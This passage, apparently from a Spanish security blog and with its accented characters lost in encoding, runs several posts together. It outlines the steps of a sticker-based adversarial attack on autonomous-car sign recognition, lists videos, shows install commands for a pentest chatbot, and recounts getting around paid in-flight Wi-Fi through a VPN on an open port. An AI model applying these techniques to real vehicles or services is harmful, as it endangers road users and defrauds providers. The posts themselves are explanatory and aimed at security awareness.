La principal condici�n para que este tipo de ataque tenga �xito es que el atacante tenga acceso al clasificador despu�s de haber sido entrenado. Esto que puede parecer complicado, es m�s sencillo de conseguir de lo que parece en un principio por varios motivos. El primero son las t�cnicas utilizadas en visi�n artificial, las cuales son bastante comunes y cuyo acceso a los algoritmos e incluso al c�digo fuente de algunas librer�as es abierto y totalmente accesible. Por otro lado, es posible adivinar el modelo utilizado simplemente probando y entrenando un sistema similar y comprobar sus datos de salida.

Para preparar el ataque, se siguieron los siguientes pasos:

1. Obtener al menos una imagen clara de la carretera y de la se�al sin ninguna perturbaci�n. 

2. Se extrae la se�al desde la imagen tomada en el punto 1 para luego cortarla y separarla del resto utilizando un algoritmo de detecci�n de im�genes o un software espec�fico de recorte de im�genes. 

3. La imagen obtenida y sus resultados en el clasificador son introducidos en el algoritmo de ataque, el cual genera una nueva imagen que ser� la base para luego introducir las modificaciones. Por ejemplo, marcar, cortar o difuminar la parte que rodea a la imagen. 

4. Una vez a�adida la perturbaci�n �ambiental� (en el paper se llama �adversarial perturbation�) en el paso 3, ahora se aplica una funci�n de mapeo que, en funci�n de la ubicaci�n f�sica de se�al, indicar� d�nde colocar la perturbaci�n �digital� (llamada perturbaci�n �digital adversarial�). 

5. Esta perturbaci�n digital se fabrica en funci�n a los resultados obtenidos con la funci�n de mapeo en forma de pegatinas o poster.

Figura 6: Recreaci�n del proceso de identificaci�n de se�ales realizado por un veh�culo aut�nomo.

A pesar de lo perturbador (y a la vez fascinante) de este ensayo, el cual est� a�n en una fase muy temprana de desarrollo, pero hay que empezar a tomar nota para el futuro, ahora es el momento de buscar posibles soluciones para intentar evitar este tipo de ataques. Una de ellas pasar�a por hacer que el veh�culo sepa exactamente en qu� ubicaci�n se encuentra y contraste en todo momento la informaci�n que est� recibiendo de las se�ales. Por ejemplo, si es una calle dentro del casco urbano, es imposible que haya una se�al que le indique un l�mite de velocidad alto.

Esto es s�lo un ejemplo de las nuevas fronteras que se est�n abriendo en la seguridad, los cuales no s�lo los coches aut�nomos son el objetivo, estas t�cnicas podr�an ser utilizadas tambi�n, por ejemplo, en t�cnicas de Realidad Aumentada, c�maras de seguridad que utilicen tambi�n t�cnicas de IA para el reconocimiento de im�genes y un largo etc. Desde luego, tanto si eres aficionado la seguridad o te dedicas a esto, no te vas a aburrir en los pr�ximos meses o incluso a�os ;)

Figura 7: Broma de disfraz de radar m�vil
PD: Este trabajo recuerda a lo que hace a�os se hizo muy popular. La bromadonde se disfrazaron de Radar M�vil para enga�ar a los conductores y hacerles detenerse. El v�deo de hizo muy popular, incluso con la detecci�n de los bromistas.

Autor: Fran Ram�rez (@cyberhadesblog) escritor de libro "Microhistorias: an�cdotas y curiosidades de la historia de la inform�tica" e investigador en ElevenPaths

Despu�s de una semana intensa de trabajo, para hoy viernes he decidido dejaros en le blog algunos v�deos que ten�a pendientes. No son nuevos, pero no os hab�a avisado de ellos por el blog, as� que os los dejo por si os apetece verlos.

Figura 1: Viernes con "V" de v�deos

El primero es  realmente un podcast. Es una charla que tuve con mi amigo Gonzalo �lvare Mara��n de El Arte de Presentar sobre algunas de las cosas que uso yo para dar las charlas. A mucha gente hablar en p�blico le resulta dif�cil - en mi caso concreto, yo sufr�a p�nico al principio - pero todo el mundo puede hacerlo perfectamente.

Sobre este tema, Gonzalo y yo escribimos un peque�o art�culo sobre las cosas que creemos que no se deben hacer en una presentaci�n t�cnica, titulado: "17 errores y medio en una presentaci�n t�cnica". Por cierto, esta charla la puedes escuchar y descargar tambi�n en formato podcast.

El segundo v�deo es de una presentaci�n que dieron David y Jos� de Layakk - entonces de Taddong - sobre la seguridad en las comunicaciones GSM/UMTS/GPRS/2G/3G, all� por el a�o 2010, m�s o menos.

Como sab�is, David y Jos� son los autores del libro de 0xWord "Hacking y Seguridad en Comunicaciones M�viles", y en esta charla hablan de algunas cosas de las que se habla en el libro.

Tambi�n, hace un par de semanas estuve en la radio de Onda Cero participando en una peque�a charla en la secci�n de Madrile�os Ilustres. Dura media hora y la pod�is escuchar en este v�deo.

Y el �ltimo v�deo que os dejo es una ElevenPaths Talk hecha en formato conversaci�n entre los CSA se ElevenPaths, donde Rames, Jorge Rivera, Felix y Yaiza hablan de Criptograf�a, Criptomonedas y otras hierbas.

Y esto es todo, que la semana haya sido provechosa de trabajo y teng�is un buen viernes que os lleve a un mejor fin de semana.

Saludos Malignos!

Redes sociales, equipos para CTFs, comunidades, foros... hoy en d�a es muy raro encontrarse hackers que sean "lobos solitarios", as� que el estereotipo "Forever Alone" que los sit�a como frikis que se aislan entorno al PC de su escritorio dista mucho de la realidad...

No obstante, �a qui�n no le gustar�a tener (y controlar?) a un asistente ro-bot que te ayude durante un pentest? Ser�a algo as� como comunicarte con Madre a bordo del Nostromo pero como un ayudante que te gu�a y te da las t�cnicas y herramientas de hacking necesarias para realizar un intrusi�n.



Bueno, pues ya tenemos un primer y t�mido intento de desarrollar un bot con el que poder chatear tranquilamente y colaborar mientras haces un trabajito. Se trata de hackerbot de �mer G�nal que combina un chatbot con Python AIML y varios m�dulos con distintas herramientas y utilidades.

Instalaci�n

git clone https://github.com/omergunal/hackerbot
cd hackerbot
chmod +x install.sh
./install.sh

Uso

Python v2.7 requerido

python hackbot.py

argumentos en el chat:
   !help          show what you can do



Como veis es un principio, pero podr�a ser la piedra de toque para incluir nuevos m�dulos y tener un verdadero y complejo colega virtual y, qui�n sabe, alg�n d�a decirle "Jeffrey, veme hackeando la NSA que voy un momento a tirar la basura".

Github: https://github.com/omergunal/hackerbot

�A qui�n no le gusta viajar? En mi caso, disfruto tres veces de los viajes: al planificarlos, durante el viaje y finalmente, clasificando las fotos y los recuerdos que me he tra�do. Pero hay una cosa del viaje que todos odiamos: las horas muertas en el avi�n cuando el sistema de entretenimiento del mismo es horrible. En mi caso, un vuelo desde Madrid a Vancouver con un sistema de entretenimiento malo hizo que me fijase en otras cosas. Por suerte, algunas aerol�neas ofrecen conexi�n a Internet desde el avi�n, por un m�dico "no tan m�dico" precio.

Figura 1: Go! Go Online in flight! (Con tu VPN montada en una Raspberry Pi)

Muchas de aerol�neas que ofrecen acceso a Internet desde el avi�n ofrecen el servicio de una compa��a llamada Gogo , como son British Airways, Iberia, American Airlines, Japan Airlines, etc�tera. La forma de dar el servicio puede ser bien, enviando y recibiendo la se�al tierra (ATG, Air-To-Ground) o desde un sat�lite, o una combinaci�n de ambas. Una vez la se�al llega al avi�n, es convertida al est�ndar Wi-Fi para poder ser consumido por los pasajeros del avi�n. 

Figura 2: Se�al Wi-Fi dentro del avi�n

Cuando el avi�n alcanza la altura adecuada, el servicio se activa y cualquiera que se conecte a la red wifi del avi�n llega a un portal donde la aerol�nea ofrece la posibilidad de contratar varios paquetes, con un ancho de banda determinado. Algunas incluso permiten ver las pel�culas del sistema de entretenimiento en nuestro m�vil o tablet. Vino a mi cabeza un post que le� hace algunos meses en alg�n sitio de c�mo funcionaban este tipo de servicios, en los que solamente los puertos 80 y 3128 parec�an bloqueados.

Figura 3:Portal de la aerol�nea a trav�s de la red Wi-Fi

Por suerte, ten�a en casa una Raspberry Pi, configurada con Open VPN con Pi-Hole por encima para bloquear publicidad y trackers, lo t�pico. Pero lo ten�a escuchando a un puerto que no era ni el 80 ni el 3128. En el primer vuelo, al conectarme al Wi-Fi me permit�a descargarme una app de App Store para ver las pel�culas del avi�n desde el m�vil, lo cual significaba que ten�a salida a Internet. Pero, como era de esperar, la VPN no levant�. No obstante, podr�a navegar por Internet durante unos minutos gratis, el tiempo que el sistema estimaba oportuno que se tardaba en bajar la app.

Con un poco de tiempo en el hotel, reconfigur� el servidor VPN para que escuchase el puerto 3128. Y deseando estaba de que llegase la hora de subirme de nuevo al avi�n, a pesar de mi miedo a volar. Una vez el avi�n lleg� a la altitud en la que los pasajeros de desabrochan los cinturones, encend� el Wi-Fi del m�vil y prob� a levantar la VPN.

Figura 4: OpenVPN en un iPhone, antes de conectarse

�Funcion�! Como se puede ver en las siguientes capturas, la conexi�n se hab�a establecido correctamente.

Figura 5: Conexi�n VPN realizada correctamente

Se ha conectado correctamente a la Raspberry Pi, que a su vez limpia publicidad y trackers con Pi-Hole (DNS primario).

Figura 6: Log de conexi�n a la VPN

La direcci�n IP del tel�fono ya aparece como si fuera la de mi casa. A partir de ah� pude consultar el correo, refrescar los feed de noticias y decirle a mis padres que el vuelo iba bien.

Figura 7: Direcci�n IP del terminal iPhone, situada en Madrid

Dados los precios del servicio, me pregunt� cu�ntas personas estar�an conectadas al mismo, pero parece que fui el �nico que estaba enganchado en ese momento.

Figura 8: Todo el ancho de banda para m�

Y finalmente, prob� a acceder por SSH a la Raspberry, cosa que funcion� tambi�n.

Figura 9: Me sent�a como en casa, literalmente

Sirva esta experiencia para demostrar que incluso a diez mil metros de altura, los servicios y herramientas que las soportan necesitan una constante monitorizaci�n de seguridad, seguida de las medidas correctivas necesarias.

Autor: Miguel Gallego @_Mich